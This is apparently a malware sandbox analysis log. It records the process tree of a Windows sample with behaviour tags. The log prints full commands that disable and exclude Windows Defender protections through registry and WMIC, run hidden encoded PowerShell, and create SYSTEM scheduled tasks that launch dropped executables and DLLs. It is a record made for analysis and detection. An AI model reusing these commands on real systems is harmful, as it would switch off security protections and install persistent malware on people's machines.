C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 66⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 66⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 66⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force7⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gbHOttqsP" /SC once /ST 05:05:52 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gbHOttqsP"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gbHOttqsP"3⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True6⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\mrYrpJCpOmktZWwz" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\mrYrpJCpOmktZWwz" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\mrYrpJCpOmktZWwz" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\mrYrpJCpOmktZWwz" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\mrYrpJCpOmktZWwz" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\mrYrpJCpOmktZWwz" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\mrYrpJCpOmktZWwz" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\mrYrpJCpOmktZWwz" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\mrYrpJCpOmktZWwz\hvpBtANe\LiRcOqjHRTiPIomc.wsf"3⤵
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\mrYrpJCpOmktZWwz\hvpBtANe\LiRcOqjHRTiPIomc.wsf"3⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BeEwQyQINcRtuKICoSR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BeEwQyQINcRtuKICoSR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\REeMUtPoCvFU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\REeMUtPoCvFU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RcAuZGsZhuUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RcAuZGsZhuUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kLpsRMujXEpbC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kLpsRMujXEpbC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tffvHWJZU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tffvHWJZU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\NGysLhxJEZNwhMVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\NGysLhxJEZNwhMVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\OCvADAshLKsLAwgHj" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\OCvADAshLKsLAwgHj" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\mrYrpJCpOmktZWwz" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\mrYrpJCpOmktZWwz" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BeEwQyQINcRtuKICoSR" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BeEwQyQINcRtuKICoSR" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\REeMUtPoCvFU2" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\REeMUtPoCvFU2" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RcAuZGsZhuUn" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RcAuZGsZhuUn" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kLpsRMujXEpbC" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kLpsRMujXEpbC" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tffvHWJZU" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tffvHWJZU" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\NGysLhxJEZNwhMVB" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\NGysLhxJEZNwhMVB" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\OCvADAshLKsLAwgHj" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\OCvADAshLKsLAwgHj" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\mrYrpJCpOmktZWwz" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\mrYrpJCpOmktZWwz" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "WFVPvOFzrjCnPPlbL" /SC once /ST 07:56:41 /RU "SYSTEM" /TR "\"C:\Windows\Temp\mrYrpJCpOmktZWwz\vkQZSkunSJsHwFm\MRIeKcq.exe\" 7d /LkTkdidTc 525403 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "WFVPvOFzrjCnPPlbL"3⤵
-
C:\Windows\Temp\mrYrpJCpOmktZWwz\vkQZSkunSJsHwFm\MRIeKcq.exeC:\Windows\Temp\mrYrpJCpOmktZWwz\vkQZSkunSJsHwFm\MRIeKcq.exe 7d /LkTkdidTc 525403 /S2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 66⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 66⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 66⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 66⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force7⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "butYHpXTvMdZIJsEKZ"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &3⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\tffvHWJZU\vtrHUB.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "oiGBDDjiIQmhwtu" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "oiGBDDjiIQmhwtu2" /F /xml "C:\Program Files (x86)\tffvHWJZU\MvInhGQ.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "oiGBDDjiIQmhwtu"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "oiGBDDjiIQmhwtu"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "mVOvxPujqogGhF" /F /xml "C:\Program Files (x86)\REeMUtPoCvFU2\tVnNdis.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "PuKixiXcCNlkt2" /F /xml "C:\ProgramData\NGysLhxJEZNwhMVB\vzXuKFq.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "PNkVCGbsoOwbzBvhS2" /F /xml "C:\Program Files (x86)\BeEwQyQINcRtuKICoSR\xHlkyMh.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "OEjxyANCnYwFWrViDzJ2" /F /xml "C:\Program Files (x86)\kLpsRMujXEpbC\WUvLWAB.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "dSPsRFCNvoTMekFez" /SC once /ST 09:33:28 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\mrYrpJCpOmktZWwz\USAgGrWm\goIDPOp.dll\",#1 /ncRdidZa 525403" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "dSPsRFCNvoTMekFez"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "WFVPvOFzrjCnPPlbL"3⤵
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\mrYrpJCpOmktZWwz\USAgGrWm\goIDPOp.dll",#1 /ncRdidZa 5254032⤵
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\mrYrpJCpOmktZWwz\USAgGrWm\goIDPOp.dll",#1 /ncRdidZa 5254033⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "dSPsRFCNvoTMekFez"4⤵
-
C:\Windows\system32\taskeng.exetaskeng.exe {98DC021E-7158-4845-81E0-42938B111EBD} S-1-5-21-2297530677-1229052932-2803917579-1000:HKULBIBU\Admin:Interactive:[1]1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "17040661163606816211459348239-1371369296-1312493933-1629531986165718372249795688"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-14044629571913233331-16969504841885903599-69209380934681172-552112098-1093135446"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1138496574-7652555631698911440369085305-1379088437-2072386236-1309656936-2110769062"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1034231236-138340381276585791210017618431521093377-1963981940-604360197-1037286050"1⤵
-
